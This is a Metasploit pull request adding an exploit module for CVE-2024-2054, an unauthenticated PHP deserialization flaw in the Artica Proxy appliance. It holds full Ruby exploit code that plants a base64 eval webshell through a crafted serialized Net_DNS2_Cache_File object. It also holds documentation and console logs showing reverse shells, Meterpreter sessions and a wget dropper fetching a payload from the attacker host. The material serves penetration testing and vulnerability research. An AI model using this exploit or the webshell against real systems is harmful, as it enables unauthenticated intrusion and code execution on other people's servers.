### PR TITLE
Artica Proxy unauthenticated RCE [CVE-2024-2054]

### DIFF
--- a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md
+++ b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md
@@ -1,0 +1,209 @@
+## Vulnerable Application
+
+A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows remote attackers
+to run arbitrary commands via unauthenticated HTTP request.
+The Artica Proxy administrative web application will de-serialize arbitrary PHP objects
+supplied by unauthenticated users and subsequently enable code execution as the `www-data` user.
+
+## Installation steps to install Artica Proxy appliance
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download the Artica Proxy iso image from [here](https://sourceforge.net/projects/artica-squid/files/ISO/).
+* Install the iso image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options.
+* Boot up the VM and should be able to access the Artica  appliance.
+* Either thru the console, `ssh` on port `22` or via the `webui` via `https://your_articaproxy_ip:9000`.
+
+You are now ready to test the module.
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http//artica_proxy_unauth_rce_cve_2024_2054`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set webshell cuckoo`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename without extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+
+```shell
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info
+
+       Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
+     Module: exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054
+   Platform: PHP, Unix, Linux
+       Arch: php, cmd, x64, x86
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-03-05
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Jaggar Henry of KoreLogic Inc.
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP
+      1   Unix Command
+      2   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
+                                        sics/using-metasploit.html
+  RPORT      9000             yes       The target port (TCP)
+  SSL        true             no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The Artica Proxy endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+  WEBSHELL                    no        Set webshell name without extension. Name will be randomly generated if left un
+                                        set.
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on t
+                                      he local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  1981             yes       The local port to listen on.
+
+
+  When TARGET is not 0:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+Payload information:
+
+Description:
+  A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows
+  remote attackers to run arbitrary commands via unauthenticated HTTP request.
+  The Artica Proxy administrative web application will deserialize arbitrary PHP objects
+  supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-2054
+  https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054
+  https://packetstormsecurity.com/files/177482
+
+
+View the full module info with the info -d command.
+```
+
+### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
+```shell
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo
+webshell => cuckoo
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0
+target => 0
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set rhosts 192.168.201.4
+rhosts => 192.168.201.4
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.4:9000 can be exploited.
+[+] The target is vulnerable. Artica version: 4.50
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.4
+[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
+[*] Meterpreter session 15 opened (192.168.201.8:4444 -> 192.168.201.4:33986) at 2024-03-15 17:46:04 +0000
+
+meterpreter > sysinfo
+Computer    : artica-applianc
+OS          : Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+### Target 1 - Unix Command `cmd/unix/reverse_bash` session
+```shell
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1
+target => 1
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.4:9000 can be exploited.
+[+] The target is vulnerable. Artica version: 4.50
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
+[*] Command shell session 16 opened (192.168.201.8:4444 -> 192.168.201.4:46286) at 2024-03-15 17:48:40 +0000
+
+uname -a
+Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
+```shell
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2
+target => 2
+msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.4:9000 can be exploited.
+[+] The target is vulnerable. Artica version: 4.50
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:1981/U835crbue3yBo
+[*] Client 192.168.201.4 (Wget/1.20.1 (linux-gnu)) requested /U835crbue3yBo
+[*] Sending payload to 192.168.201.4 (Wget/1.20.1 (linux-gnu))
+[*] Sending stage (3045380 bytes) to 192.168.201.4
+[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
+[*] Meterpreter session 17 opened (192.168.201.8:4444 -> 192.168.201.4:35246) at 2024-03-15 17:50:04 +0000
+[*] Command Stager progress - 100.00% done (119/119 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : artica-applianc.domain.tld
+OS           : Debian 10.13 (Linux 4.19.0-24-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+
+## Limitations
+No limitations.

--- a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md
+++ b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md
@@ -1,9 +1,13 @@
 ## Vulnerable Application
 
-A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows remote attackers
-to run arbitrary commands via unauthenticated HTTP request.
+A Command Injection vulnerability in Artica Proxy appliance version `4.50` and `4.40`
+allows remote attackers to run arbitrary commands via unauthenticated HTTP request.
 The Artica Proxy administrative web application will de-serialize arbitrary PHP objects
 supplied by unauthenticated users and subsequently enable code execution as the `www-data` user.
+
+This module has been tested with:
+* Artica Proxy Appliance 4.50 running in VirtualBox 7.0.14 r161095 (Qt5.15.2)
+* Artica Proxy Appliance 4.40 Service Pack 118 running in VirtualBox 7.0.14 r161095 (Qt5.15.2)
 
 ## Installation steps to install Artica Proxy appliance
 * Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.

--- a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md
+++ b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md
@@ -46,7 +46,7 @@ For the native PHP target, by default the `eval()` function will be used for nat
 
 ## Scenarios
 
-```shell
+```msf
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info
 
        Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
@@ -131,7 +131,7 @@ View the full module info with the info -d command.
 ```
 
 ### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
-```shell
+```msf
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo
 webshell => cuckoo
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0
@@ -160,7 +160,7 @@ Server username: www-data
 meterpreter >
 ```
 ### Target 1 - Unix Command `cmd/unix/reverse_bash` session
-```shell
+```msf
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1
 target => 1
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit
@@ -179,7 +179,7 @@ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 ```
 ### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
-```shell
+```msf
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2
 target => 2
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit

--- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
+++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
@@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('No Artica version found.') if version_match.nil?
 
       version = version_match[0].split(' ')
-      if Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40')
+      if version.count > 1 && Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40')
         return CheckCode::Vulnerable("Artica version: #{version[1]}")
       else
         return CheckCode::Safe("Artica version: #{version[1]}")

--- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
+++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
@@ -1,0 +1,197 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Artica Proxy Unauthenticated PHP Deserialization Vulnerability',
+        'Description' => %q{
+          A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows
+          remote attackers to run arbitrary commands via unauthenticated HTTP request.
+          The Artica Proxy administrative web application will deserialize arbitrary PHP objects
+          supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Jaggar Henry of KoreLogic Inc.' # Discovery of the vulnerability
+        ],
+        'References' => [
+          ['CVE', '2024-2054'],
+          ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-2054'],
+          ['PACKETSTORM', '177482']
+        ],
+        'DisclosureDate' => '2024-03-05',
+        'Platform' => ['php', 'unix', 'linux'],
+        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => ['php'],
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
+              'Linemax' => 16384,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 9000
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The Artica Proxy endpoint URL', '/' ]),
+      OptString.new('WEBSHELL', [false, 'Web shell name without extension. Name will be randomly generated if left unset.', nil]),
+      OptEnum.new('COMMAND',
+                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])
+    ])
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
+      },
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")
+    @webshell_full_path = "/usr/share/artica-postfix/wizard/#{@webshell_name}"
+
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    # Upload webshell with PHP payload
+    if target['Type'] == :php
+      php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
+    else
+      php_payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"
+    end
+
+    php_payload_len = php_payload.length
+    webshell_full_path_len = @webshell_full_path.length
+    final_payload = "O:19:\"Net_DNS2_Cache_File\":4:{s:10:\"cache_file\";s:#{webshell_full_path_len}:\"#{@webshell_full_path}\";s:16:\"cache_serializer\";s:4:\"json\";s:10:\"cache_size\";i:9999999999;s:10:\"cache_data\";a:1:{s:#{php_payload_len}:\"#{php_payload}\";a:2:{s:10:\"cache_date\";i:0;s:3:\"ttl\";i:9999999999;}}}"
+    final_payload_b64 = Base64.strict_encode64(final_payload)
+
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'wizard', 'wiz.wizard.progress.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        'build-js' => final_payload_b64
+      }
+    })
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200
+
+    # Check if target is an Artica Proxy appliance
+    # Search for the Artica Version tag on the login page
+    html = res.get_html_document
+    unless html.blank?
+      version_match = html.text.match(/Artica.{1,2}\d\.\d\d/)
+      return CheckCode::Unknown('No Artica version found.') if version_match.nil?
+
+      version = version_match[0].split(' ')
+      if Rex::Version.new(version[1]) <= Rex::Version.new('4.50')
+        return CheckCode::Vulnerable("Artica version: #{version[1]}")
+      else
+        return CheckCode::Safe("Artica version: #{version[1]}")
+      end
+    end
+    CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    res = upload_webshell
+    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 500
+    register_file_for_cleanup(@webshell_full_path)
+
+    case target['Type']
+    when :php
+      execute_php(payload.encoded)
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_cmdstager({ linemax: target.opts['Linemax'] })
+    end
+  end
+end

--- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
+++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
@@ -17,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Artica Proxy Unauthenticated PHP Deserialization Vulnerability',
         'Description' => %q{
-          A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows
-          remote attackers to run arbitrary commands via unauthenticated HTTP request.
+          A Command Injection vulnerability in Artica Proxy appliance version 4.50 and 4.40
+          allows remote attackers to run arbitrary commands via unauthenticated HTTP request.
           The Artica Proxy administrative web application will deserialize arbitrary PHP objects
           supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
         },
@@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('No Artica version found.') if version_match.nil?
 
       version = version_match[0].split(' ')
-      if Rex::Version.new(version[1]) <= Rex::Version.new('4.50')
+      if Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40')
         return CheckCode::Vulnerable("Artica version: #{version[1]}")
       else
         return CheckCode::Safe("Artica version: #{version[1]}")

--- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
+++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2024-2054'],
-          ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-2054'],
+          ['URL', 'https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054'],
           ['PACKETSTORM', '177482']
         ],
         'DisclosureDate' => '2024-03-05',
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options([
       OptString.new('TARGETURI', [ true, 'The Artica Proxy endpoint URL', '/' ]),
-      OptString.new('WEBSHELL', [false, 'Web shell name without extension. Name will be randomly generated if left unset.', nil]),
+      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),
       OptEnum.new('COMMAND',
                   [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])
     ])


### PR DESCRIPTION
 A Command Injection vulnerability in Artica Proxy appliance version `4.50` and `4.40` allows remote attackers to run arbitrary commands via unauthenticated HTTP request.
The Artica Proxy administrative web application will de-serialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the `www-data` user.

This module has been tested with:
* Artica Proxy Appliance 4.50 running in VirtualBox 7.0.14 r161095 (Qt5.15.2)
* Artica Proxy Appliance 4.40 Service Pack 118 running in VirtualBox 7.0.14 r161095 (Qt5.15.2)

## Installation steps to install Artica Proxy appliance
* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. 
* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
* Download the Artica Proxy iso image from [here](https://sourceforge.net/projects/artica-squid/files/ISO/).
* Install the iso image in your virtualization engine. 
* When installed, configure the VM appliance to your needs using the menu options.
* Boot up the VM and should be able to access the Artica  appliance either thru the console, `ssh` on port `22` or via the `webui` via `https://your_articaproxy_ip:9000`.

You are now ready to test the module.

## Verification Steps

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http//artica_proxy_unauth_rce_cve_2024_2054`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set webshell cuckoo`
- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings

```shell
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info

       Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
     Module: exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-03-05

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Jaggar Henry of KoreLogic Inc.

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
                                        sics/using-metasploit.html
  RPORT      9000             yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The Artica Proxy endpoint URL
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host
  WEBSHELL                    no        Set webshell name without extension. Name will be randomly generated if left un
                                        set.


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on t
                                      he local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  1981             yes       The local port to listen on.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)

Payload information:

Description:
  A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows
  remote attackers to run arbitrary commands via unauthenticated HTTP request.
  The Artica Proxy administrative web application will deserialize arbitrary PHP objects
  supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-2054
  https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054
  https://packetstormsecurity.com/files/177482


View the full module info with the info -d command.
```
## Scenarios
### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
```shell
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo
webshell => cuckoo
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0
target => 0
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set rhosts 192.168.201.4
rhosts => 192.168.201.4
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.4
[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
[*] Meterpreter session 15 opened (192.168.201.8:4444 -> 192.168.201.4:33986) at 2024-03-15 17:46:04 +0000

meterpreter > sysinfo
Computer    : artica-applianc
OS          : Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
### Target 1 - Unix Command `cmd/unix/reverse_bash` session
```shell
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1
target => 1
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
[*] Command shell session 16 opened (192.168.201.8:4444 -> 192.168.201.4:46286) at 2024-03-15 17:48:40 +0000

uname -a
Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
```shell
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2
target => 2
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:1981/U835crbue3yBo
[*] Client 192.168.201.4 (Wget/1.20.1 (linux-gnu)) requested /U835crbue3yBo
[*] Sending payload to 192.168.201.4 (Wget/1.20.1 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.201.4
[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
[*] Meterpreter session 17 opened (192.168.201.8:4444 -> 192.168.201.4:35246) at 2024-03-15 17:50:04 +0000
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : artica-applianc.domain.tld
OS           : Debian 10.13 (Linux 4.19.0-24-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
## Limitations
No limitations.


